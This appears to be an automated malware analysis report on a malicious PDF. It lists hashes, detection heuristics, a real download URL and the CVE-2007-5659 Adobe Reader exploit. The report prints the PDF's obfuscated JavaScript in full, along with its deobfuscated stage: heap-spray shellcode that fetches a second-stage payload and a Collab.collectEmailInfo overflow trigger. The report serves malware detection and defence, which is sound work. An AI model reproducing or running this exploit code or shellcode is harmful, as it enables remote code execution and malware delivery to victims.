Malicious PDF — malware analysis report

Static analysis result for SHA-256 dc7ee54c3edfbcbe…

MALICIOUS

PDF

4.6 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 6a9b3ba3f22f734715e5cd759204f6c6 SHA-1: be8a73d8d827f3568828ff57aeb9410ce8b06d8f SHA-256: dc7ee54c3edfbcbeb67feadf55502aacecb601abaf0ba8a37d8d2b190938cf99
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the JavaScript is being used to execute arbitrary code, likely to download and run a second-stage payload. The presence of obfuscation indicators in the extracted artifact further supports this. No specific malware family could be confidently identified.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function LeTBRvixNFgNg0(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function vGgJDdWTh(eHBOUVj){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(eHBOUVj)"+";"+"}");eval("function J5iS7MfcIU(LsceO1B){var iWg7wYVgmmQZ="+"0,DQeGa1=LsceO1B.l"+"en"+"gth,LphDl=10"+"2"+"4,HUgOqM2,MDRjp69qGLzh1,g2ILr1Z='',Ps7vHxI=iWg7wYVgmmQZ,SAWWt=iWg7wYVgmmQZ,m3CtOBaOQrP=iWg7wYVgmmQZ,AGkntyg=Ar"+"ra"+"y(63,19,2,48,61,9,41,35,62,4 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/spl3/load.php?id=8761&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x36C 6292 bytes
SHA-256: 90133d3338b2ee3799597afbb8b94a4512ddee396cd614ecc1e7debf277e31db
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 193 of 257 identifiers look randomly generated (e.g. 'H6HnpnZ6wS8YpnZ6wCzSwnZOZTB4wnZ6'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function LeTBRvixNFgNg0(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function vGgJDdWTh(eHBOUVj){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(eHBOUVj)"+";"+"}");eval("function J5iS7MfcIU(LsceO1B){var iWg7wYVgmmQZ="+"0,DQeGa1=LsceO1B.l"+"en"+"gth,LphDl=10"+"2"+"4,HUgOqM2,MDRjp69qGLzh1,g2ILr1Z='',Ps7vHxI=iWg7wYVgmmQZ,SAWWt=iWg7wYVgmmQZ,m3CtOBaOQrP=iWg7wYVgmmQZ,AGkntyg=Ar"+"ra"+"y(63,19,2,48,61,9,41,35,62,44,0,0,0,0,0,0,36,37,58,31,22,47,52,16,42,33,34,26,56,7,50,25,14,0,32,45,46,53,11,38,8,13,43,0,0,0,0,15,0,4,27,12,51,20,1,6,3,60,29,40,28,23,10,21,54,18,5,30,39,24,49,55,17,57,59);f"+"o"+"r(MDRjp69qGLzh1=M"+"at"+"h.c"+"ei"+"l(DQeGa1/"+"LphDl)"+";MDRjp69qGLzh1>iWg7wYVgmmQZ;MDRjp69qGLzh1-"+"-){fo"+"r(HUgOqM2=Ma"+"th.m"+"in(DQeGa1,LphDl);HUgOqM2>iWg7wYVgmmQZ;HUgOqM2-"+"-,DQeGa1-"+"-){m3CtOBaOQrP|"+"=(AGkntyg[LsceO1B.cha"+"rCod"+"eAt(Ps7vHxI+"+"+)-48])<"+"<SAWWt;if(SAWWt){g2ILr1Z+"+"=vGgJDdWTh"+"(239^m3CtOBaOQrP&"+"2"+"5"+"5);m3CtOBaOQrP>"+">="+"8;SAWWt-"+"="+"2;}el"+"se{SAWWt="+"6"+";}}"+"}return (g2ILr1Z);}var ExxDG4NmaH9CJK=implode('',['_t6','7','j','8cJiK5wnT','ZkoHLWtJ4dq0lRnJyd','TpOt','PKy','vg14d5HORcT6IQgLdH','N57bCz','v','XKOwmJ5kZP','id6T6Rsdu','HDH','LWip','4Wg','0cA','_7y','IgPk','J','_CcJDp4Au2BHf_kJfJLWM','D','lw1tBW2BY7','6K6JbNbw','b','KcAXKOwmJ5kZ8','cvq0cJDp4Au2BHeV','ydXKOwm','J5','kZ89F','_7k','AjC5WRTK3lHO7lTO','tgg','XJM0436T6RsduH','DHLWip4WQwSv','e','0ltnT6W','jgLdXKO','wmJ5kZ','q4dq8lJKg','X7','bKX','Rf8i','JSTBS6','JSZATXHpNL6ys9','v_1ydOBut_7KISNzJD','NbHZpZW_V4','d','CCywc8Y7CdLwcq','4d','OBu','t_zOWszSt9Tnk4qHSas','yd','q09W','fHXtcBLtnsld','nZ','yplE','YwnZy','plEYwnZyplEY','wnZyw6','HKZnZ5wlZj','ZnZO','pOdHUnZyUC','wH','UnZyU','C','0SwnZ6H6NYwn','Z6H','jEYwnZ6HSWHZnZ6Hm','0S','pnZO','H6HnZnZOH6WKH','nZyUSJjHnZyH','6TSHnZ6H6HKHnZOpbZK','HnZ6','HlzKH','nZ6U6W4pnZypjtn','wnZ','6U6W4pnZOpHHnpnZ','6H68YwnZ6H6HKZn','ZOp','b','Z','KHnZOZD0','YwnZOpsCY','pnZ6HszHw','nZywu0','YwnZ6H6BSwnZ6H6','H','KHn','Z6ZTWj','pn','ZOZDZKZ','nZ','5puCYpnZOpKz','Swn','ZywuZHwn','Z6H','6B','jHnZ','6H6HKHnZ6ZT','WjpnZOZ','DZn','pnZ5ZT','sYpnZ','6wCZjHnZ','ywuw4','HnZ6H684HnZ6H6HKH','nZ6Z','TWjpnZO','ZDZnwn','ZywCCYp','nZyw6','pSwn','Zyw','uCjHnZ6H6N','jZnZ6H6HKHnZ6ZT','WjpnZOZ','Dt','KH','n','Z','OwHsYpn','ZywTK','jpnZywuZY','pnZ6H','6','pSUnZ','6H','6HKHnZ6ZTW','jpnZ6Z6W','KZnZy','H','utjHnZ','6UT','pYZnZOpOzSpnZOHuz','HZn','Z6Hm0jpnZ6H','6HHHnZOZ','sZ','KHnZ6U','TWjpnZOpbdK','ZnZ6H','SBHZnZ6HHsSpnZO','pbw','KpnZOHuwHZnZ','ywuwH','UnZ6H6W4p','n','Z','6H6HKHnZ','yUuwKHnZOHKEHUnZ6U6NBwnZ5p','m','0YpnZ','6H6HKHnZO','pOZKHnZOH','lzH','ZnZOwTW4pnZ','O','w6W','YZ','nZ','OpO','wKHnZ5Z6BHZnZ6wCCY','pnZ6H6HK','HnZ','OZ6HKHnZ6ZTW4','p','n','ZyUKtKZ','nZO','ZOZBHnZ','OZTW4','pnZ','y','w','utnp','n','Z6H6sS','H','nZ6H6HKHnZ6ZTH','nZnZOwmdKHnZOZlZKHnZ5Z','sbSwnZOw','m','CSZnZ6HSB','KHnZ','y','UT','K','Ypn','Z6H6HK','HnZ6UTB4wnZOpb','dKHnZ6H','lzHZnZ6HHsSpnZOpbw','Kpn','ZOHuwHZnZ6Z68YpnZ','6','H6','H','KHnZyUK','ZKHnZOZuZBUnZ6','ZTHnZnZyH9NK','ZnZOZ9N4','pnZ','6w','CwnZnZ5Z6KS','ZnZOZ9pK','HnZ6ZT','W4pn','ZyUK','tnwnZO','ZOZHZnZ','OZT','W4p','nZywutnpnZ6H','6NnZnZ6H6H','KH','nZ','6','H6sSpnZ6UT','B','4w','nZOpbdKHnZ6Hu','z','HZnZ','6HZsSpnZOpbwKpnZ','OHuwHZnZOH','68YpnZ6H6','HKHnZy','UKZ','KHnZOpbz4wnZOH6','B','HZnZ','6HHsSpnZOp','b','w','KpnZOHu','w','HZ','nZ6H','68Y','pnZ6H6H','KHn','Z6','ZHHK','HnZOZZpBpnZyw','HHnZ','nZywHH','nZnZy','wHHn','ZnZ','ywHHn','ZnZ','y','w','l','tYZnZOZKZKZnZ','Op','bw','nZnZ','y','wZ','NSpnZO','ZZB4UnZyw6B4wnZO','pbwHZ','nZOp','b0','YwnZ6Hub','jwnZOZjt4pnZOZD','Znw','nZ6U','9W4pnZO','pbE','nwn','ZOH','sbjZnZ','6H','9KYpn','ZO','ZDzYZ','nZ6','UD','t4pnZ6H9NK','HnZy','H9BYZnZ6Z','Owjp','nZy','pjzH','HnZOw9H','nZnZyH9pHUnZ','6HCzSUnZ','OH6','HSwnZ6wZT','H','pnZ6HubjZnZOws','w','SHnZ6H9H','KwnZ6Z','6','B4HnZ6wH84pnZ6wsE','BpnZ6','U','TpHwnZ','OZ','K','0S','ZnZywbt4','p','nZOZKt4pnZ6H9NKZnZyUDdjwn','Z6','Hlt4p','n','Z','OpbzBpnZOHlwHpnZ5wjZ','nZ','nZ6HSW4pnZ6H9W','4pnZOZswSZnZOwZpKwnZ6','H6HnpnZ6wS8YpnZ6wCzSwnZOZTB4wnZ6','ZlwBHnZ6ZC','zKwnZ6H6BH','wnZ','5p','b','t','4UnZ','5pC74pnZO','w6NSZ','nZOp','s','wjHnZOpjtj','w','nZ5wDd','SwnZO','wHNjwnZOpHW','YwnZ5plwjHnZ','Op9J4wnZ','Ow6','NYwn','ZOp6WYZnZOp','btSwnZ5pCwSH','nZ5pCt4UnZ','OpDdjHnZ5w','ZW4pnZ5','w','ud4UnZ5','wsdjpnZ5pl','wjpnZ','Op9J4w','nZ5wbd','4HYbcU','_t','67j8lEAskEL','84dq0iwm','T4','wC','04wC','14dOBut_dnwkWLpuwy6','BKK','7_V4','dsW6wsz5Z','Z2K','E@K','VImgiRng','XJbsLdr0lwe0lWP','pyd','6T6R','sduH','DH','LWip4W_V4','d','4DB','I8Jzw_VidMdnw','kWLpuwy6B','K','K','7','a','04AlCSve0lWPpydXKOwmJ5kZ89F','_ZORnN57','P86J','Mw9N','KK4','wD0S','NKK4wD0jdg14dXK','OwmJ5kZ89F_Z','n','tcT4SM7kAjC5W','RTB3_','tBW','2','BY76K6JbNb','wbKcU_t6','7j89AU','p6kC0','9F','_CcHrpnEVK5E','6TKEK','893_0','4A','b04wC04w','g','hlEAskE','L8','YU_t','X','Rj','8iv','OBut_VH7uhkU2KV6q0YUJB','X','pQKSRpq','BFDDbtJ8','YUJBXpQKSRp','qnvabide','8cJ','i','K5','wn','TZko','HLW','tJYSJBX','pQKSRpqH9_V4dXKOwmJ5','kZ8cv','_zOWszSt9Tnk4','qHSas5','U_Vydq','8lJKgX7','bKX','Rf8','lWt','D','kIcKy','vg0c','A','_t67j897XqnECW','XplW6Ru','p4JZ89F_','zLtCg','lWgHXWnpOTn','p5tg2uRfE5RiTOtg','gXJMbcU_zXJ@Nzt5JYt','OnXWjELH_V4dPJX6i8OJudOW','2JO','wVT','K3jHL','t','hB','X','7ns','c3','dTn','3XPldYbcU_t67j8cH','QDbAIBz','kL2nTQKj','H889F_MkJ','u89Zjp67D','s97Xq','nE','CWXplW6','Rup4JZgc7MBu','tTTyvCbi3PJ','X6i','8OJ','udOW2JO','wVTK3csk7j','BBWMzSvhz','XJ','@','N','zt5JYtOnX','WjE','LHfdLIPp6','Zbslwgb','cU','_buJ_Civk','2uSogHE7JVkL2','kU6BVSCVzd','qV4dm0lN50ivM7','nRU','DOk8PnTRJVRDtHE','F','BS','9_VSF_z','4d','5tidk','2uSogHE','7JVkL','2kU6BVSjVzd10lwg0i@18','cHQDbAIBzkL2nTQKjH8qZ','wN8','iF_zSvg0i@18ivk2uS','ogHE','7J','VkL2kU6','BVSCVzd','qV4du0lN50cHQD','bAIBzkL2nTQKj','H8','qZwN8iF','_z','S','v__','y','@_CcHQDbAIBzkL2nTQKjH8qzwN8iF_','7Svg','0cA_E','uZZsbH','uzK6VJHScsKTMbcU','_t67','j8i','6JgkTCT','Ldq09Wf','HXtc','BLt','nsld','nZ','ywc8Y','7nZywc8Y7Ybc','U','_7yIg','Pk','JMCHkfHztVg','iRn','gXJbsL','d10i','pbb','Sp','jbidtnK','R','B8','yJ','_19F_CHkfHztVq4d','b','s','kIlgc','7QPLR','PpXEb2ut','n8','9F_dnRhPk7','Ygc','7QPL','RnNL','WHnk7gPk6fWXRM15tKpuI','o0ldY_9RlJ','uU_CHkfHztVn6ve09@_Vy','dOsKIgNkA','MbcU']);");eval(J5iS7MfcIU(ExxDG4NmaH9CJK));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36C 2607 bytes
SHA-256: 7a448d4f07d15a02a1b0057dd7bd96bbd738b577cdbeacb561a40c85413ab6a8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var gSy3eTMzetH7 = new Array(); function Esc4X(gy2xwOD, Ftm1cFyetS2t) { while (gy2xwOD.length*2<Ftm1cFyetS2t){gy2xwOD += gy2xwOD;} gy2xwOD = gy2xwOD.substring(0,Ftm1cFyetS2t/2); return gy2xwOD; } function dBDXF7AJdGYcHV() { var GjBSdySFDRu = 0x0c0c0c0c; var qv11qCDORKYkx = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3738%u3136%u7326%u6C70%u343D"); var RJhQW0 = 0x400000; var C3Gf47rHUIb = qv11qCDORKYkx.length * 2; var Ftm1cFyetS2t = RJhQW0 - (C3Gf47rHUIb+0x38); var gy2xwOD = unescape("%u9090%u9090"); gy2xwOD = Esc4X(gy2xwOD, Ftm1cFyetS2t); var yZrM0 = (GjBSdySFDRu - 0x400000)/RJhQW0; for (var Ma7o9mYK=0;Ma7o9mYK<yZrM0;Ma7o9mYK++) { gSy3eTMzetH7[Ma7o9mYK] = gy2xwOD + qv11qCDORKYkx; } } function vHjicy() { var agKSpf7svmw2dD = app.viewerVersion.toString(); agKSpf7svmw2dD = agKSpf7svmw2dD.replace(/\D/g,""); var GoZzNQLWOWo9FQ = new Array(agKSpf7svmw2dD.charAt(0),agKSpf7svmw2dD.charAt(1),agKSpf7svmw2dD.charAt(2)); if ((GoZzNQLWOWo9FQ[0] == 8 && ((GoZzNQLWOWo9FQ[1] == 1 && GoZzNQLWOWo9FQ[2] < 2) || GoZzNQLWOWo9FQ[1] < 1)) || (GoZzNQLWOWo9FQ[0] == 7 && GoZzNQLWOWo9FQ[1] < 1) || (GoZzNQLWOWo9FQ[0] < 7)) { dBDXF7AJdGYcHV(); var HMnUpd = unescape("%u0c0c%u0c0c"); while(HMnUpd.length < 44952) HMnUpd += HMnUpd; this.collabStore = Collab.collectEmailInfo({subj: "",msg: HMnUpd}); } } vHjicy();

Open this report in the interactive analyzer, or submit your own file for analysis.